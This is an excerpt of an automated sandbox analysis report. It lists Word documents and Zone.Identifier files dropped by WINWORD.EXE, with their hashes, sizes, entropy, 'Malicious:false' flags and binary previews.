                            SSDEEP:3072:JIbAqZnQ3rEppuOynw5L5muOTK6vLkGO/TDUEe73Dh35SoIbm1NszF2bBB99O:SFqrEL7k45mJHkGO43DIblF2bBLg
                            MD5:2C2FEDF2B4033C4688DABF690D312F57
                            SHA1:A62311735191D2A5AECDF434F55D21324DDAEC30
                            SHA-256:2F11A1F5204381685847D61CA0696344FCE77D8666D90BF52938B65C4AA1DE66
                            SHA-512:48553B07CB5A4C679FCCEC99F6A5D9D089C75F7006BFE071A45ADC799C9805F45FED1ED423DA3354F5047A0D4F2B80578BCDBB1EDE294E3BAEE2BE80C33DE79F
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198334
                            Entropy (8bit):7.95799711713318
                            Encrypted:false
                            SSDEEP:3072:JIbeqsRQ5c5BHrXxUVlTK5TpY4ao31bWMpIQt1zcZ9K6H4NTBCb1YX:SPsRc6HrBaK5dYnMNg9/kTAbE
                            MD5:F26F74F9BA6CE452181589C53A4C9E98
                            SHA1:EECD426086CD4F59F33B622597F7304E9AD20C0A
                            SHA-256:FD2F9E35E6E381224ACD57A70ED634CC99C3FC694C96BAE298753A28160A8CC7
                            SHA-512:F15D12DE5ADFCAA99005F415983D22B27BC6FEEBEA98168DCF1843C62AC4D7947F4BB568512B6D1F5082112937A79031C857854C023078DCF299EDF136DDD3EC
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115506
                            Entropy (8bit):7.945584603393691
                            Encrypted:false
                            SSDEEP:3072:JIb2FFeol8gh9xtOmWj/1HHWu+Wg1LBkP2l:SkFeol7h9fORlXg1L2+l
                            MD5:1A8E5BF37CEC79F4EDA22D5B383E8FB5
                            SHA1:DD9BA3BAA6B8E0CDDD98A1812B31A3AB0F3DA443
                            SHA-256:B7B0A50BAC944B40E604A50F1F3FD7ACD14CE01E93C808C6BB56A489B8E10EDE
                            SHA-512:F5F3E348AE16A29914BF886D07831FEB4BC730B2B714C50F8BC3B105DBA3EB59C0F203DB6E697599BB47A7B9AB13D9D902839F6F714BAD627B2D1F60D5CD756D
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115516
                            Entropy (8bit):7.946025334642921
                            Encrypted:false
                            SSDEEP:3072:JIbzZol8gxwo+uc8nYQuTUjgcOiWu+4Y6AQeBtEK2z:Stol7xGL8nN2unOiPb80Pz
                            MD5:1EDF6E793B49A5DE896E14E480728FC7
                            SHA1:01F5FBE700F19D8A7CB49DA66B0A9F6BE6E3414B
                            SHA-256:9458B726B93E775637328455724C36244B3EFDEEB40601D7AC32339D062D04EC
                            SHA-512:74F2DE144AADE884BEC43C5C009FE9AC8008590716175B3A63EC6749D8B2412488EC98C79DA97A0EF16E8847E20BBAD8A2A450A2ED949DC78F1D27F632576E29
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198329
                            Entropy (8bit):7.958440100470825
                            Encrypted:false
                            SSDEEP:3072:JIb5+ig5sUMEFWcjSxwTsnq71YMxApOfj3/vT1NqzTYb+BOEk:S5VMI+LjSSwnK1YMx9j/vaTe+05
                            MD5:E0F3602DEF6258070F4C355D1D6BA1A8
                            SHA1:1B5AD0538D8CC1CFB4A2C3E6458A3AA7F758B3BD
                            SHA-256:669E857FA9E327F5C429C8F9AEED84F76F1A66EF7413EFE3FCF8D1A162C83F69
                            SHA-512:7872135AC0A669BB6FDFF9CBD406DBF173FEAFA824ABB851C633D2E2F3949373A0F35FBA18C3FD7D9C894DE813C4877A6B64609B19462638CEC64AB67669C075
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115514
                            Entropy (8bit):7.944916941340719
                            Encrypted:false
                            SSDEEP:3072:JIbbvxPBClfUmRafRJvVX7PSirQSmRnqBY+qz:SbvlBClfUmQvVLPSirJm9qJ4
                            MD5:170780A0A1E335235622269B40E183AA
                            SHA1:8A35C0B8927D799372CE5E62A33392AE2234CDAA
                            SHA-256:6F482CCA4BC7D2DE6C5711ED609F4D81C72E79DE08618B4086E94992D014CD69
                            SHA-512:F5DC13A01C4BDBD98EB84AE0B58FC63C44F0E62D4B17381E3A42F8564620183B92C381219A58F9798B2997DCDD391B95160B87C68996B97B323109AE4D6CC98C
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198338
                            Entropy (8bit):7.957971840201952
                            Encrypted:false
                            SSDEEP:3072:JIb91HlHXhVuBHT1wsnllwmsj3DUiXyKMMIDlGh35SGe6TrukAcaYs/NEhB3+K5:SvlHRQBHJW3E2IDldmjax/ChsC
                            MD5:4894AC3A2DAF9C56BE1A8FB12A9D95B6
                            SHA1:B903659B74D8171E21BB9A8BF7B93DF6EA1559CB
                            SHA-256:3EB0326C432BF5E6EAB9AF23BA377AE839D7F5A169A92DA6BFF4A22343C3D95E
                            SHA-512:3A5654DA0DE5332B326D2D3C296A1BDFF4D0A2369533C0225252F7CDE8AF1E28AFE70C0267C1FE5A2D403F725F81B006D712A5E82D39BA26084C71697CA7AA7B
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198334
                            Entropy (8bit):7.957579234597544
                            Encrypted:false
                            SSDEEP:3072:JIb3l+XxxRvQEF33SUa7TbzS17lB5u+YsRV480z0o3gYG5X+hB/q:S3l+7lQEJXcG1R/u+YwQQPQh0
                            MD5:3DFB2799C21B93CD40AF48BDAC3C9EB8
                            SHA1:BF49A4D658B27700FB61EC55C898C3DBAA8F4CBE
                            SHA-256:892C19B59A36A70773FD69B088006185CD8B0B154F06D4AA4B6ED4F75F8034EF
                            SHA-512:2A1B457EDBB5E90549080A926194FCFCF0ED5B1B155D1F3266BAE12E3B33202CE6A986EEA419415438BC0F4F9FEC96BFC3236D16FF8D687F44F95CEB9E740F6B
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115509
                            Entropy (8bit):7.945098339504775
                            Encrypted:false
                            SSDEEP:3072:JIbEx5h3fpMLWuRH+CSjgcOHtYlZB4n82A:SmJfpYW3C4nOHtAmVA
                            MD5:3CF43858C348265716D3F0144B98D6BA
                            SHA1:A1AD492CA006A0C88A81E3818C1646BDA6B81976
                            SHA-256:235622C3715FA809F234FE8728786AEE8604EF5B254DBDFF615F1D99226B78D9
                            SHA-512:6F7A11FD3B9D90B00111E9711712728516B5B284EC2F2E21721B48137A47A26D522F217775022BEB00D72E539D82AF4E20DD2AEFCFBD3A8D04B4764BE0C302CA
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115697
                            Entropy (8bit):7.94643016308236
                            Encrypted:false
                            SSDEEP:3072:JIbIaEol8gxwo+uc8nYQuTUjgcOiWu+UxSIB+6V2R:SzEol7xGL8nN2unOiVSInYR
                            MD5:30074151D958881C6D54F549FBA6C6CD
                            SHA1:8DB29BF83B90052392DF390E57FCC1DA8E2C2E38
                            SHA-256:2F5F3784A8E3EBF22A13F048E800C20A7A56915E8A04552FE404CA868793ECCD
                            SHA-512:92C2484F1AC0C008670774E876409D30BFA2276CECB7C2E9B9ED0A61B74389093F0B35417B6433BD8F2E21BFDE4E1BCCF91C05D7E77ABAC7F743768F7F94D75E
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115510
                            Entropy (8bit):7.944875911848628
                            Encrypted:false
                            SSDEEP:3072:JIbxz+fcq/KS1+FKrvCMlq/NkH21pGpCxVeB9L8O:SxyfcOKS8FKCfmzDLr
                            MD5:B4A67DA81C422F231FF779FB3703E220
                            SHA1:5BD9EC1C92136154446AA6EEBC43E9AFF47D1998
                            SHA-256:E7BBD1E7B1092DBD81BC2BC45BC51EBBA7FD2148454371BCFF94400519625257
                            SHA-512:7EE0A21CB934D878658682AE78B47666C4400D3E1A7B29B00E35D5602D9823572525EAC3F1FB114762AD6B5EB74FCF2C18137ACFAFA32130B1B6FE7573EEEF2C
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198333
                            Entropy (8bit):7.95776196799112
                            Encrypted:false
                            SSDEEP:6144:SHkRvzstwt+tixYGhbOqJG39i0En8JNOHv6:SgsD2hb74En8JNqS
                            MD5:AF2DC06F1C72452053FEA287C5E3CA06
                            SHA1:6F50764757AE81A66349FF7148C6E009E1CE8D57
                            SHA-256:92750EA87B37090C2C7A7BE4B6881C381E5A18784AC2207055BBF4B586063E8C
                            SHA-512:F300BFD4776D7A51A6BE923466E266699078ABD9F8B4ECFF4411F0EC809974F83D8B9DBCE9CF7CE8236EDF1059C7ECB84D4D8FCF403A7B98B72A6F61522B84B9
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198576
                            Entropy (8bit):7.958328198002094
                            Encrypted:false
                            SSDEEP:3072:JIb+q4HKeC3jEFWcfkVX1Hfm4aW1gJqtlSav7rpTv6TJu3Ac2Ys/INBTwVX:S+q4qNj+LcVJuM4K/7lvmO2x/INxwZ
                            MD5:0C39B32CBD6932AB28E3FB6D61B904A8
                            SHA1:1216194F6AF50CE485521F70E0B3D309A40890D7
                            SHA-256:57E91F3E5E11EA731924B9D51C90AAB0CB5CDC4399C0838D3B4C11487D50B77B
                            SHA-512:46099EC311AF78FCF4C351D02F00CD72CC76CDC0AAC27D3871A17A9382B2A2E2C21EF9CD3B93A87F857FF04990573863D01DABF486CE8930B1161692899F4AD7
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198334
                            Entropy (8bit):7.958080289887734
                            Encrypted:false
                            SSDEEP:3072:JIbDlfZ7lCyPHJEFWcaLc69BOFYCqc4ajA1bDMpMaAcopZkq4fO8B5lB4LtK:SDlf1HJ+LadbOFYCL6MZBoHkLfb3l2LA
                            MD5:261032FA5873DA0334898355C0043A5E
                            SHA1:9FF2CDC16E7DF27E9F45FDA12860FC28157319FA
                            SHA-256:FAE6143859AD7BCAF63F630B0DE717D313A8599C438C4D0CB28D9526E4B663F2
                            SHA-512:91753B8165CF79601656B484799CACCBD3D5B6A2166516B7E74192437B7A84AE0E2902309020852912FE02F2AC86126BE20BE9DFFB2F833208163783490D33A7
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
